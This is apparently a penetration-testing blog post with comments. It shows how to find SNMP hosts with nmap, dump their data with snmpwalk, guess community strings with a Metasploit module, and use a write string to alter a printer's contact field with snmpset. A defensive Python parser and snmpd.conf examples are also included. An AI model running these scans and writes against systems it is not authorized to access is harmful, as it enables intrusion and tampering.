First, if you’ve never fully researched SNMP (Simple Network Management Protocol), I suggest you do that now, because you’re doing yourself a major disservice by not knowing about (or using) the information that’s available through this protocol… not to mention the amount of remote control you have over a machine if you’re able to get hold of an administrative community string.

Most network devices that ship with SNMP enabled have two (or more) different community strings. A community string is, basically, the only authentication you need in order to gain access through SNMP. There will be a “read only” community string (usually ‘public’) and a read/write community string (usually ‘private’). Lately, vendors have been doing a better job of making sure that the default community strings don’t ship with read/write enabled, but not all of them have.

Even if you don’t have the read/write string, simply being able to read from a system gives out a wealth of information. You can view shares, see installed programs, find open ports, pretty much everything you’d ever want to know about a system.

So, first you need to find a box on the network that has SNMP available:

# nmap -sU 1.2.3.* -PN -p161 --open

Now, probably the easiest way to collect info from a box is with ‘snmpwalk’:

$ snmpwalk -c public -v1 1.2.3.4 >> output.txt

The SNMP version will be different depending on the device. If ‘-v1’ doesn’t work, try ‘-v2c’. If that doesn’t work, try ‘-v3’ (note that v3 uses user-based authentication rather than a community string, so ‘-c’ doesn’t apply there). I find most often it’s either version 1 or 2c.

The output will look something like this:

SNMPv2-MIB::sysDescr.0 = STRING: Canon iR C5185 /P
SNMPv2-MIB::sysObjectID.0 = OID: SNMPv2-SMI::enterprises.1602.4.7
DISMAN-EVENT-MIB::sysUpTimeInstance = Timeticks: (409740748) 47 days, 10:10:07.48
SNMPv2-MIB::sysContact.0 = STRING: joe@microsoft.com
SNMPv2-MIB::sysName.0 = STRING: Canon iR C5185
..huge snip..

Now, let’s say that you want to actually change one of these settings. This is where the read/write community string comes into play. The problem, though, is that you don’t know what it is. It could literally be anything…

Enter Metasploit. :-D

I was actually going to write a tool to do this but decided to search the Metasploit modules first to see what they had for SNMP tools and came across the “scanner/snmp/community” module.

Usage is incredibly simple:

# msfcli scanner/snmp/community rhosts=1.2.3.4 e
[*] Please wait while we load the module tree...
[*] >> progress (1.2.3.4-1.2.3.4) 0/118...
[*] 1.2.3.4 'public' 'Canon iR C5185 /P'
[*] 1.2.3.4 'canon_admin' 'Canon iR C5185 /P'
[*] Scanned 1 of 1 hosts (100% complete)

Sweet.. so the second community string is “canon_admin”. I’m willing to bet that with a name like “admin”, it probably has read/write capabilities..

# snmpget -v1 -c canon_admin 1.2.3.4 sysContact.0
SNMPv2-MIB::sysContact.0 = STRING: joe@microsoft.com

# snmpset -v1 -c canon_admin 1.2.3.4 sysContact.0 s matt@attackvector.org
SNMPv2-MIB::sysContact.0 = STRING: matt@attackvector.org

# snmpget -v1 -c canon_admin 1.2.3.4 sysContact.0
SNMPv2-MIB::sysContact.0 = STRING: matt@attackvector.org

Yep, sure enough.

You can use ‘snmpget’ to read a specific OID and ‘snmpset’ to write one. snmpset takes the OID, a type letter and then the value; the ‘s’ before the value indicates that we’re supplying a string.
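To make the “community string is the only authentication” point concrete, here is an added example (my code, not from the original post): a small Python parser that pulls the version, community string and PDU type out of a raw SNMPv1/v2c datagram, the way a sensor on UDP/161 would when flagging SetRequests or community strings that are not on its read-only allowlist. The sample datagrams are constructed inline with a short BER helper (the `_enc`, `build_v1_message` and `classify` names are mine); ‘canon_admin’ and sysContact.0 are the values used in the post above, while the request-ids and the “new-contact” value are made up.

```python
PDU_TYPES = {0xA0: "GetRequest", 0xA1: "GetNextRequest", 0xA2: "GetResponse",
             0xA3: "SetRequest", 0xA4: "Trap", 0xA5: "GetBulkRequest",
             0xA6: "InformRequest", 0xA7: "SNMPv2-Trap"}
SYS_CONTACT_0 = bytes.fromhex("2b06010201010400")   # BER body of OID 1.3.6.1.2.1.1.4.0 (sysContact.0)

def _tlv(data: bytes, off: int):
    """Decode one BER TLV at `off`; return (tag, value, offset after it). Long-form lengths handled."""
    tag, length, off = data[off], data[off + 1], off + 2
    if length & 0x80:                      # long form: low 7 bits = number of length octets
        n = length & 0x7F
        length, off = int.from_bytes(data[off:off + n], "big"), off + n
    return tag, data[off:off + length], off + length

def parse_snmp_header(datagram: bytes) -> dict:
    """Return version, community and PDU type of an SNMPv1/v2c datagram.
    Raises ValueError for anything else (SNMPv3 has a different header and no community)."""
    tag, msg, _ = _tlv(datagram, 0)
    if tag != 0x30:
        raise ValueError("not an SNMP message SEQUENCE")
    tag, ver, off = _tlv(msg, 0)
    version = int.from_bytes(ver, "big")
    if tag != 0x02 or version not in (0, 1):   # 0 = SNMPv1, 1 = SNMPv2c
        raise ValueError(f"unsupported SNMP version field {version}")
    tag, community, off = _tlv(msg, off)
    if tag != 0x04:
        raise ValueError("missing community OCTET STRING")
    pdu_tag = _tlv(msg, off)[0]
    return {"version": "v1" if version == 0 else "v2c",
            "community": community.decode("latin-1"),
            "pdu": PDU_TYPES.get(pdu_tag, f"unknown(0x{pdu_tag:02x})")}

def classify(datagram: bytes, expected_ro=("public",)) -> str:
    """'write' for any SetRequest, 'unexpected-community' if not on the read-only allowlist, else 'ok'."""
    hdr = parse_snmp_header(datagram)
    if hdr["pdu"] == "SetRequest":
        return "write"
    return "ok" if hdr["community"] in expected_ro else "unexpected-community"

# Constructed sample datagrams (short-form BER is enough at these sizes; request_id must be < 128).
def _enc(tag: int, body: bytes) -> bytes:
    return bytes([tag, len(body)]) + body

def build_v1_message(community: bytes, pdu_tag: int, request_id: int, varbind: bytes) -> bytes:
    """version=0, community, PDU{request-id, error-status=0, error-index=0, VarBindList[varbind]}."""
    pdu = _enc(0x02, bytes([request_id])) + _enc(0x02, b"\x00") * 2 + _enc(0x30, varbind)
    return _enc(0x30, _enc(0x02, b"\x00") + _enc(0x04, community) + _enc(pdu_tag, pdu))
GET_SYSCONTACT = build_v1_message(b"public", 0xA0, 1,        # shape of what `snmpget -v1 -c public` sends
                                  _enc(0x30, _enc(0x06, SYS_CONTACT_0) + _enc(0x05, b"")))
SET_SYSCONTACT = build_v1_message(b"canon_admin", 0xA3, 2,   # shape of what `snmpset -v1 -c canon_admin ... s` sends
                                  _enc(0x30, _enc(0x06, SYS_CONTACT_0) + _enc(0x04, b"new-contact")))
```

A real sniffer would feed the UDP payload of each port-161 packet to `classify` and alert on anything other than ‘ok’ from hosts that are not the management station.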

  1. clong says:

    Enjoying your blog so far!

    This may help convince my company to lock down SNMP on our printers :-)

  2. Matt says:

    @clong: What type of printers are they? If they’re HP, you may want to check out a few of my other posts.. specifically parts 2 and 3.

    Fun With Printers (Part 1)
    Fun With Printers (Part 2)
    Fun With Printers (Part 3)

    Also, I hope that I didn’t give the impression that this only affects printers.. I was just doing it against a printer because it was the most readily available device that I had access to at the moment.. :-)

  3. sidereal_ says:

    Can you disseminate your config file (/etc/snmp/snmpd.conf)? Because I want to change some information, for example sys.sysLocation.0, sys.sysContact.0, but I didn't :(

  4. Matt says:

    Prior to any changes:
    $ snmpwalk -v2c localhost -c public
    SNMPv2-MIB::sysDescr.0 = STRING: Linux [snip]
    SNMPv2-MIB::sysContact.0 = STRING: Root (configure /etc/snmp/snmpd.local.conf)
    SNMPv2-MIB::sysLocation.0 = STRING: Unknown (configure /etc/snmp/snmpd.local.conf)

    After changes:
    $ snmpwalk -v2c localhost -c public
    SNMPv2-MIB::sysDescr.0 = STRING: "Windows XP"
    SNMPv2-MIB::sysContact.0 = STRING: "matt@attackvector.org"
    SNMPv2-MIB::sysLocation.0 = STRING: "Uranus"

    What I added to snmpd.conf:

    $ tail /etc/snmp/snmpd.conf
    # Further Information
    #
    # See the snmpd.conf manual page, and the output of "snmpd -H".
    # MUCH more can be done with the snmpd.conf than is shown as an
    # example here.

    syslocation "Uranus"
    syscontact "matt@attackvector.org"
    sysdescr "Windows XP"

    http://linux.die.net/man/5/snmpd.conf
